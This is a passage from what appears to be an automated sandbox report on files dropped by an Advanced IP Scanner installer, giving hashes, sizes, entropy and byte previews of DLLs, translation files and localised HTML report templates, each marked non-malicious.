                                                                                                                                                                                                  SHA-256:A10D0CF6FC8DD20290BD11529DC1DB210D69B05FE518F2248D6D720AF8495470
                                                                                                                                                                                                  SHA-512:99C008F4CE997384D024390A896275BCD10B53D8725F1E9CB2628AB119B1381DABC5189C60C85A817C52AF33AC3D0E2D190373C9F7F8707A6FDD508E61C4C2B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Z....;.......;.......;.......;..!....;..D....O..]....[..Y^...^..0....^..U...(5......G.......H,..R...K...A...N:...r..V...F..._...^.......)d......R;...y..R.......................Z....t..+%...t..S*...t..]=.....A....j......5t......@...C...H5..[O..f...0.......F....................~..3....`..8|...e..\.......\........(. =...G..*.y.....*.y.....*.%..%..*.0..%;.+...../.+.......+....^.+......+....&..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)..J6....n.J6......J6....*.J6...Js.LD......L.b..]r.M.S..B`.R.......V....0..Wi...\J.W.T.....Z.|..S..[f3..W..gc....@.w0K..I ..H...%.......^T...T...%..."..5....~..8... d..GQ...T../...2....7......[.......b..9.E..At.L.#..d..M$o...h.e.......l8...7....^..J...I....H......C.......T.......[u..>...S..>......3..09..l...LZ......;,.5.l..a..AV...(..y....Y....0..U.......T.......[...tb..6f......................V.......>.......P..(....UP.1V...)..R....2..W.<..a..f.~.."N......5*..1...._...^..6....5...A..........c..G..;6...cU.q.J..Q...I....;..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-IK3SG.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.960490184684636
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
                                                                                                                                                                                                  MD5:B9EA058418BE64F85B0FF62341F7099E
                                                                                                                                                                                                  SHA1:0B37E86267D0C6782E18F734B710817B8B03DA76
                                                                                                                                                                                                  SHA-256:653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
                                                                                                                                                                                                  SHA-512:EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-IVQT8.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.018574692016083
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
                                                                                                                                                                                                  MD5:44CA070DC5C09FF8588CF6CDCB64E7A2
                                                                                                                                                                                                  SHA1:63D1DA68CD984532217BEACC21B868B46EC5D910
                                                                                                                                                                                                  SHA-256:EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
                                                                                                                                                                                                  SHA-512:C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-J1OH8.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                  Entropy (8bit):4.850275626289269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lForPQsuSRBXqDH03Rrh0Kt5RGDVx3rgReEhyv:HyPQsRRBXqDHyRt0U2DVtras
                                                                                                                                                                                                  MD5:6B21CA02EF7F5C3E6641DBB222A207DC
                                                                                                                                                                                                  SHA1:215CE642734FDA5004F603E593FAA2EB70663500
                                                                                                                                                                                                  SHA-256:3B0A1534FFEF9FB0B1BA169DDA53E26A940E0C644A47D8567E4E804D3DFADF24
                                                                                                                                                                                                  SHA-512:A61FEAEBB6819C6B2CCC8120FB5E64CE71E8399C19221255FB7C3BCB9F557291A75CF965704003A7EA748753097B9E43D0548C1ACC9FE76DA490F70D55B85461
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Olek:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Ops.steem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tootja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kasutaja:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T..p:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Kuup.ev:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentaarid:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Teenus</center></b></td><td><b><center>.ksikasjad</cente

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-J88JR.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1256
                                                                                                                                                                                                  Entropy (8bit):5.1672203710221565
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
                                                                                                                                                                                                  MD5:38E55188530EE1FC3B88A22697957911
                                                                                                                                                                                                  SHA1:BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
                                                                                                                                                                                                  SHA-256:EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
                                                                                                                                                                                                  SHA-512:F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-J9QQ4.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1151
                                                                                                                                                                                                  Entropy (8bit):4.790118218856679
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
                                                                                                                                                                                                  MD5:5AD712B9C416EE21623D620AB6019FB4
                                                                                                                                                                                                  SHA1:51DF096A58D6DF2A7CE33E22511C671883F2228C
                                                                                                                                                                                                  SHA-256:38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
                                                                                                                                                                                                  SHA-512:608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-JOPC8.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.011995208399749
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
                                                                                                                                                                                                  MD5:D6ABF5C056D80592F8E2439E195D61AC
                                                                                                                                                                                                  SHA1:33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
                                                                                                                                                                                                  SHA-256:8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
                                                                                                                                                                                                  SHA-512:6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-JVTK3.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28292
                                                                                                                                                                                                  Entropy (8bit):5.300323619618019
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
                                                                                                                                                                                                  MD5:70059C7809B9DB196A6A58588536B7D6
                                                                                                                                                                                                  SHA1:6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
                                                                                                                                                                                                  SHA-256:7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
                                                                                                                                                                                                  SHA-512:EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........ZZ...;...p...;.......;.......;..!....;..D....O..]8...[..X....^..0....^..T...(5......G.......H,..Q...K...@...N:......V...FA.._...^X......)|......Q....y..RA.......a..............Z2...t..++...t..R....t..\......A....j......5t......@...C...H5..Z...f...0.......F........s...........~..3....`..8|...e..\M......\s......... =...G..*.y...b.*.y...%.*.%..%X.*.0..%..+.......+.......+......+......+....''.G.... ..G....+..H0...\..Hw9.....Hw9.....I....)..J6....:.J6......J6......J6...Jo.LD......L.b..]..M.S..BL.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wf.gc......w0K..I0..H...&;......]....T......."..5....~..8... d..Gg...T../...2...........[b......a..9.E..AF.L.#..dQ.M$o.....e.......l8...7....^..J...I...........D4......T}......[...>...A..>......3..0E..l...L.......;..5.l..`..AV...(..y....Yi...0..UN......T7......Z...tb..6................a......U.......>d......P6.(....T..1V...*..R....2..W.<..aI.f.~.."x......5n..1....9...^..7....5...1..........c..G..;6...b..q.J..Q...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-KDMOJ.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1155
                                                                                                                                                                                                  Entropy (8bit):4.85707182260681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
                                                                                                                                                                                                  MD5:1AD783BD4AF434D47BD69AB818A91DFA
                                                                                                                                                                                                  SHA1:8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
                                                                                                                                                                                                  SHA-256:2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
                                                                                                                                                                                                  SHA-512:1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-L3ANO.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):900288
                                                                                                                                                                                                  Entropy (8bit):6.823623458577979
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
                                                                                                                                                                                                  MD5:3E0303F978818E5C944F5485792696FD
                                                                                                                                                                                                  SHA1:3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
                                                                                                                                                                                                  SHA-256:7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
                                                                                                                                                                                                  SHA-512:C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L....:.U...........!................0.....................................................@A........................P,..f....2.......P...................<...`..dX..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..dX...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-L409S.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1149
                                                                                                                                                                                                  Entropy (8bit):4.789609676615686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
                                                                                                                                                                                                  MD5:C81043ED485CCE96CDA08A5986F04E31
                                                                                                                                                                                                  SHA1:8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
                                                                                                                                                                                                  SHA-256:119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
                                                                                                                                                                                                  SHA-512:56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-L4L9S.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24768
                                                                                                                                                                                                  Entropy (8bit):6.778007627268145
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
                                                                                                                                                                                                  MD5:5E72659B38A2977984BBC23ED274F007
                                                                                                                                                                                                  SHA1:EA622D608CC942BDB0FAD118C8060B60B2E985C9
                                                                                                                                                                                                  SHA-256:44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
                                                                                                                                                                                                  SHA-512:ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...............$...<..............8............................................................................text............................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-LDLQ9.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                                  Entropy (8bit):4.79937338549848
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
                                                                                                                                                                                                  MD5:A420CCFD66627A25731173A49B1C98E1
                                                                                                                                                                                                  SHA1:CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
                                                                                                                                                                                                  SHA-256:FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
                                                                                                                                                                                                  SHA-512:99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-LEVQP.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3329597
                                                                                                                                                                                                  Entropy (8bit):6.563278634392228
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:AdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334Pi:yJYVM+LtVt3P/KuG2ONG9iqLRQu3334a
                                                                                                                                                                                                  MD5:CB7E324B491A203424BDF73E30AFD225
                                                                                                                                                                                                  SHA1:03D9E2D82301C50932B002F2D9493B6B67D14E77
                                                                                                                                                                                                  SHA-256:579605F32ECDFDC505D5B5D55E77E1E94D73688FE1A7A51C950166A3E13240DB
                                                                                                                                                                                                  SHA-512:283D735F448FDB0A6BC2D0D3CF6E2ACAACFC3E2FECD244609963B586AC53CC69A05AE7A7BCA14A19416FF4E7B0FC5744266F6715F665A1A8EF0BEA292D4EF3B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-LTGBA.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27753
                                                                                                                                                                                                  Entropy (8bit):4.678188889713697
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G9OyAk9n+iiUO3ipj1BlQdiJCEG7o5CjUiiPtVPpCAIA+rp9kBMHoyAC:G9OKn+i+3QjedMCUUUZVPp6z
                                                                                                                                                                                                  MD5:0D6C50CD51EDD656D636117A22517308
                                                                                                                                                                                                  SHA1:B9753A4E1D581A19D39B71187CBECCEAC0BA5066
                                                                                                                                                                                                  SHA-256:D8680E21C7F89BB60C631AF894F5DEAB5B95CF87A6624F04B087C4A1BDBEACAD
                                                                                                                                                                                                  SHA-512:91158D0D0B3DE7C34231F20542E2F2E8F98E76128C4E5B86F358E804CA6D30AD9E6162DE39FF018802CFDFA1BD6E3B3A85AB7A78AD77CC334D6478F8E815D02C
                                                                                                                                                                                                  Malicious:false
